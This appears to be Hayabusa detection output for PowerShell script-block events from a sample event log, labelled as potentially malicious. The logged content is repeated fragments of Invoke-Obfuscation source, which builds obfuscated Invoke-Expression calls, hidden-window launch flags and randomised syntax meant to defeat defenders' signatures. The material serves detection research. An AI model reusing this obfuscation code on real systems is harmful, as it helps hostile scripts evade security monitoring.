$SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will iterate through each element of the array. $BaseScriptArray1 = ""`$$RandomScriptVar[0..(`$$RandomScriptVar.$Length-1)]"" # Generate random JOIN syntax for all above options. 
$NewScriptArray1 = @() $NewScriptArray1 += $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray1 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript1 = (Get-Random -Input $NewScriptArray1) # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray2 = @() $BaseScriptArray2 += '(' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DigitDelimiterChar + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 += ""`[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int[]]"" + ' '*(Get-Random -Input @(0,1)) + ""("" + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 = (Get-Random -Input $BaseScriptArray2) # Generate random JOIN syntax for all above options. $NewScriptArray2 = @() $NewScriptArray2 += $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray2 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + $BaseScriptArray2 + ')' $NewScriptArray2 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + ')' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray2) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. 
It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Insert)"" , ""''.Insert.ToString()"")) + '[' + (Get-Random -Input @(3,7,14,23,33)) + ',' + (Get-Random -Input @(10,26,41)) + "",27]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Normalize)"" , ""''.Normalize.ToString()"")) + '[' + (Get-Random -Input @(3,13,23,33,55,59,77)) + ',' + (Get-Random -Input @(15,35,41,45)) + "",46]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Chars)"" , ""''.Chars.ToString()"")) + '[' + (Get-Random -Input @(11,15)) + ',' + (Get-Random -Input @(18,24)) + 
"",19]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.SubString)"" , ""''.SubString.ToString()"")) + '[' + (Get-Random -Input @(3,13,17,26,37,47,51,60,67)) + ',' + (Get-Random -Input @(29,63,72)) + ',' + (Get-Random -Input @(30,64)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Remove)"" , ""''.Remove.ToString()"")) + '[' + (Get-Random -Input @(3,14,23,30,45,56,65)) + ',' + (Get-Random -Input @(8,12,26,50,54,68)) + ',' + (Get-Random -Input @(27,69)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOfAny)"" , ""''.LastIndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,8,34,42,67,76,84,92,117,126,133)) + ',' + (Get-Random -Input @(11,45,79,95,129)) + ',' + (Get-Random -Input @(12,46,80,96,130)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOf)"" , ""''.LastIndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,8,29,37,57,66,74,82,102,111,118,130,138,149,161,169,180,191,200,208,216,227,238,247,254,266,274,285,306,315,326,337,345,356,367,376,393,402,413,424,432,443,454,463,470,491,500,511)) + ',' + (Get-Random -Input @(11,25,40,54,69,85,99,114,141,157,172,188,203,219,235,250,277,293,300,333,348,364,379,387,420,435,451,466,485,518)) + ',' + (Get-Random -Input @(12,41,70,86,115,142,173,204,220,251,278,349,380,436,467)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IsNormalized)"" , ""''.IsNormalized.ToString()"")) + '[' + (Get-Random -Input @(5,13,26,34,57,61,75,79)) + ',' + (Get-Random -Input @(15,36,43,47)) + "",48]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOfAny)"" , ""''.IndexOfAny.ToString()"")) + '[' + (Get-Random -Input 
@(0,4,30,34,59,68,76,80,105,114,121)) + ',' + (Get-Random -Input @(7,37,71,83,117)) + ',' + (Get-Random -Input @(8,38,72,84,118)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOf)"" , ""''.IndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,4,25,29,49,58,66,70,90,99,106,118,122,133,145,149,160,171,180,188,192,203,214,223,230,242,246,257,278,287,298,309,313,324,335,344,361,370,381,392,396,407,418,427,434,455,464,475)) + ',' + (Get-Random -Input @(7,21,32,46,61,73,87,102,125,141,152,168,183,195,211,226,249,265,272,305,316,332,347,355,388,399,415,430,449,482)) + ',' + (Get-Random -Input @(8,33,62,74,103,126,153,184,196,227,250,317,348,400,431)) + ""]-Join''"" + "")"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Randomly choose from above invoke operation syntaxes. $NewScript = (Get-Random -Input $InvokeOptions) # Reassemble all components of the final command. $NewScript = $ScriptStringPart1 + $NewScript + '}' # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. 
If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(G",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.285 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. 
$EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will iterate through each element of the array. $BaseScriptArray1 = ""`$$RandomScriptVar[0..(`$$RandomScriptVar.$Length-1)]"" # Generate random JOIN syntax for all above options. 
$NewScriptArray1 = @() $NewScriptArray1 += $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray1 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript1 = (Get-Random -Input $NewScriptArray1) # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray2 = @() $BaseScriptArray2 += '(' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DigitDelimiterChar + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 += ""`[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int[]]"" + ' '*(Get-Random -Input @(0,1)) + ""("" + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 = (Get-Random -Input $BaseScriptArray2) # Generate random JOIN syntax for all above options. $NewScriptArray2 = @() $NewScriptArray2 += $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray2 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + $BaseScriptArray2 + ')' $NewScriptArray2 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + ')' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray2) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. 
It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Insert)"" , ""''.Insert.ToString()"")) + '[' + (Get-Random -Input @(3,7,14,23,33)) + ',' + (Get-Random -Input @(10,26,41)) + "",27]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Normalize)"" , ""''.Normalize.ToString()"")) + '[' + (Get-Random -Input @(3,13,23,33,55,59,77)) + ',' + (Get-Random -Input @(15,35,41,45)) + "",46]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Chars)"" , ""''.Chars.ToString()"")) + '[' + (Get-Random -Input @(11,15)) + ',' + (Get-Random -Input @(18,24)) + 
"",19]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.SubString)"" , ""''.SubString.ToString()"")) + '[' + (Get-Random -Input @(3,13,17,26,37,47,51,60,67)) + ',' + (Get-Random -Input @(29,63,72)) + ',' + (Get-Random -Input @(30,64)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Remove)"" , ""''.Remove.ToString()"")) + '[' + (Get-Random -Input @(3,14,23,30,45,56,65)) + ',' + (Get-Random -Input @(8,12,26,50,54,68)) + ',' + (Get-Random -Input @(27,69)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOfAny)"" , ""''.LastIndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,8,34,42,67,76,84,92,117,126,133)) + ',' + (Get-Random -Input @(11,45,79,95,129)) + ',' + (Get-Random -Input @(12,46,80,96,130)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOf)"" , ""''.LastIndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,8,29,37,57,66,74,82,102,111,118,130,138,149,161,169,180,191,200,208,216,227,238,247,254,266,274,285,306,315,326,337,345,356,367,376,393,402,413,424,432,443,454,463,470,491,500,511)) + ',' + (Get-Random -Input @(11,25,40,54,69,85,99,114,141,157,172,188,203,219,235,250,277,293,300,333,348,364,379,387,420,435,451,466,485,518)) + ',' + (Get-Random -Input @(12,41,70,86,115,142,173,204,220,251,278,349,380,436,467)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IsNormalized)"" , ""''.IsNormalized.ToString()"")) + '[' + (Get-Random -Input @(5,13,26,34,57,61,75,79)) + ',' + (Get-Random -Input @(15,36,43,47)) + "",48]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOfAny)"" , ""''.IndexOfAny.ToString()"")) + '[' + (Get-Random -Input 
@(0,4,30,34,59,68,76,80,105,114,121)) + ',' + (Get-Random -Input @(7,37,71,83,117)) + ',' + (Get-Random -Input @(8,38,72,84,118)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOf)"" , ""''.IndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,4,25,29,49,58,66,70,90,99,106,118,122,133,145,149,160,171,180,188,192,203,214,223,230,242,246,257,278,287,298,309,313,324,335,344,361,370,381,392,396,407,418,427,434,455,464,475)) + ',' + (Get-Random -Input @(7,21,32,46,61,73,87,102,125,141,152,168,183,195,211,226,249,265,272,305,316,332,347,355,388,399,415,430,449,482)) + ',' + (Get-Random -Input @(8,33,62,74,103,126,153,184,196,227,250,317,348,400,431)) + ""]-Join''"" + "")"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Randomly choose from above invoke operation syntaxes. $NewScript = (Get-Random -Input $InvokeOptions) # Reassemble all components of the final command. $NewScript = $ScriptStringPart1 + $NewScript + '}' # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. 
If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(G",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"et-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
